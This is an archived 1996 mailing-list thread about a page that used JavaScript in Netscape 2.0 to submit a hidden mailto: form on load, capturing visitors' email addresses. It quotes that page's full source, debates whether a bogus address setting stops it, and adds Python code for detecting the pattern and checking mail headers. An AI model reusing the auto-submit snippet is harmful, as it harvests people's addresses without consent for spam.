JavaScript to grab email
Another annoying feature in JavaScript and Netscape. Have a look at <http://www.popco.com/grabtest.html>. The page uses JavaScript to steal your e-mail address and sends a test e-mail message to the address it grabbed. It works with Netscape, which is probably the only browser supporting JavaScript. Probably there will soon be thousands of pages which include this code, and people using Netscape 2.0 will be spammed with commercial messages. So just put some false e-mail address in your Netscape browser to disable this feature. The script was developed and announced by Glenn Fleishman, moderator of the Internet Marketing mailing list. Thanks for letting people know.

Jüri Kaljundi jk@digit.ee
Digiturg http://www.digit.ee/
On Tue, 20 Feb 1996 16:33:21 +0200 (EET), Jyri Kaljundi <jk@digit.ee> said:
Probably there will soon be thousands of pages which include this code, and people using Netscape 2.0 will be spammed with commercial messages. So just put some false e-mail address in your Netscape browser to disable this feature.
Changing the email address known to netscape doesn't help. Your email address is in the message sent, regardless of what netscape thinks your identity is. Mike
Mike Rose wrote:
On Tue, 20 Feb 1996 14:21:31 -0500 (EST), "Mark M." <markm@voicenet.com> said:
On Tue, 20 Feb 1996, Mike Rose wrote:
Changing the email address known to netscape doesn't help. Your email address is in the message sent, regardless of what netscape thinks your identity is.
I'm not sure I understand what you are saying. The Javascript program uses Netscape to send the e-mail. The only way Netscape knows your actual e-mail address is if you tell Netscape what it is.
Netscape doesn't need to know your email address. Your email address is put into the headers by sendmail. Netscape will make a "from" header of what you claim in the "identity" field, but your real address is also in the headers - "sender:" in mine.
I was under the impression that netscape doesn't run sendmail at all; it speaks SMTP directly. In that case, changing your email address in the options should suffice. However, if you do this, actually sending mail and news from netscape will get messed up, won't it? - Ian
On Tue, 20 Feb 1996, Mike Rose wrote:
Probably there will soon be thousands of pages which include this code, and people using Netscape 2.0 will be spammed with commercial messages. So just put some false e-mail address in your Netscape browser to disable this feature.
Changing the email address known to netscape doesn't help. Your email address is in the message sent, regardless of what netscape thinks your identity is.
I'm not sure I understand what you are saying. The Javascript program uses Netscape to send the e-mail. The only way Netscape knows your actual e-mail address is if you tell Netscape what it is. The comments on the page tell you that deleting your e-mail address from Netscape's config, or supplying it with a false one, prevents the script from working. I visited the page using a fake e-mail address, and have yet to be sent a confirmation e-mail.

BTW, here's the source for the page:

<HTML>
<HEAD>
</HEAD>
<BODY onLoad="document.mailme.submit()">
<!-- Howdy! yeah, the code is pretty darn simple, eh? Soon 1,000s of people
will be scamming email addresses in this manner. At least we discovered it
first. The real trick to make it stop? Put a bogus email address in your
browser's "email reply" ent. Or leave it blank-->
<form method=post name="mailme" action="mailto:reply@simenon.popco.com?subject=scammed address">
<h3>Viewing this page automatically submits email to an address which then sends you back email to prove it grabbed the message.</h3>
<input type=hidden name="scammed.the.address" value="did it">
</form>
</BODY></HTML>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
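A static check for the pattern in the page source quoted above: a form whose action is a mailto: URL and which script code submits without any user action. This is an added example, not part of the original thread; the class and function names and both sample pages are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# document.NAME.submit() or document.forms[N].submit(), in handlers or scripts
SUBMIT_CALL = re.compile(r"document\.(?:forms\[\s*(\d+)\s*\]|(\w+))\.submit\s*\(", re.I)

class MailtoFormAuditor(HTMLParser):
    """Collects mailto: forms and the forms that script code submits itself."""
    def __init__(self):
        super().__init__()
        self.mailto_forms = []       # (position on page, name, action)
        self.submit_targets = set()  # form names (lowercased) or positions as str
        self.form_count = 0
        self.in_script = False

    def note_submits(self, code):
        for m in SUBMIT_CALL.finditer(code):
            self.submit_targets.add(m.group(1) or m.group(2).lower())

    def handle_starttag(self, tag, attrs):
        attrs = {k: v or "" for k, v in attrs}
        if tag == "form":
            action = attrs.get("action", "").strip()
            if action.lower().startswith("mailto:"):
                self.mailto_forms.append((self.form_count, attrs.get("name", ""), action))
            self.form_count += 1
        elif tag == "script":
            self.in_script = True
        for key, value in attrs.items():
            if key.startswith("on"):  # onLoad and other event-handler attributes
                self.note_submits(value)

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.note_submits(data)

def audit(html):
    """Return the mailto: forms that the page submits from script code."""
    parser = MailtoFormAuditor()
    parser.feed(html)
    parser.close()
    return [{"form": name or pos, "action": action}
            for pos, name, action in parser.mailto_forms
            if str(pos) in parser.submit_targets or name.lower() in parser.submit_targets]

# Constructed samples: one modelled on the quoted page, one ordinary feedback form.
AUTO_PAGE = ('<BODY onLoad="document.mailme.submit()"><form method=post name="mailme" '
             'action="mailto:collector@example.invalid?subject=test"></form></BODY>')
MANUAL_PAGE = '<form method=post action="mailto:web@example.invalid"><input type=submit></form>'
```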
Mark M. writes:
On Tue, 20 Feb 1996, Mike Rose wrote:
Probably there will soon be thousands of pages which include this code, and people using Netscape 2.0 will be spammed with commercial messages. So just put some false e-mail address in your Netscape browser to disable this feature.
Changing the email address known to netscape doesn't help. Your email address is in the message sent, regardless of what netscape thinks your identity is.
I'm not sure I understand what you are saying. The Javascript program uses Netscape to send the e-mail. The only way Netscape knows your actual e-mail address is if you tell Netscape what it is. The comments on the page tell you that deleting your e-mail address from Netscape's config, or supplying it with a false one, prevents the script from working. I visited the page using a fake e-mail address, and have yet to be sent a confirmation e-mail.
On my system (Linux), the "Sender: " header contains my address no matter what I set my address to. -- Jeff
On Tue, 20 Feb 1996 14:21:31 -0500 (EST), "Mark M." <markm@voicenet.com> said:
On Tue, 20 Feb 1996, Mike Rose wrote:
Changing the email address known to netscape doesn't help. Your email address is in the message sent, regardless of what netscape thinks your identity is.
I'm not sure I understand what you are saying. The Javascript program uses Netscape to send the e-mail. The only way Netscape knows your actual e-mail address is if you tell Netscape what it is.
Netscape doesn't need to know your email address. Your email address is put into the headers by sendmail. Netscape will make a "from" header of what you claim in the "identity" field, but your real address is also in the headers - "sender:" in mine. Mike
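A way to test the claim debated in this thread on a message you sent to yourself: list every originator header and report addresses that appear outside the "From" line. This is an added example, not part of the original thread; the header set, function names and sample messages are constructed assumptions, and the headers your own mail path adds may differ.

```python
from email import message_from_string
from email.utils import getaddresses

# Headers that can name the originator (assumed set; extend for your mail path).
ORIGINATOR_HEADERS = ("From", "Sender", "Reply-To", "Return-Path", "X-Sender")

def disclosed_addresses(raw_message):
    """Map each originator header present to the addresses it carries."""
    msg = message_from_string(raw_message)
    found = {}
    for header in ORIGINATOR_HEADERS:
        addrs = [a.lower() for _, a in getaddresses(msg.get_all(header, [])) if a]
        if addrs:
            found[header] = addrs
    return found

def leaks_beyond_from(raw_message):
    """Addresses in other originator headers that the From line does not show."""
    found = disclosed_addresses(raw_message)
    claimed = set(found.get("From", []))
    leaks = {}
    for header, addrs in found.items():
        extra = [a for a in addrs if a not in claimed]
        if header != "From" and extra:
            leaks[header] = extra
    return leaks

# Constructed sample: bogus identity in From, login address added as Sender.
WITH_SENDER = (
    "From: nobody@example.invalid\n"
    "Sender: jdoe@workstation.example.invalid\n"
    "To: collector@example.invalid\n"
    "Subject: test\n"
    "\n"
    "scammed.the.address=did+it\n"
)
# Constructed sample: only the bogus identity appears.
FROM_ONLY = (
    "From: nobody@example.invalid\n"
    "To: collector@example.invalid\n"
    "\n"
    "scammed.the.address=did+it\n"
)
```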
participants (5)
- Ian Goldberg
- Jeff Barber
- Jyri Kaljundi
- Mark M.
- Mike Rose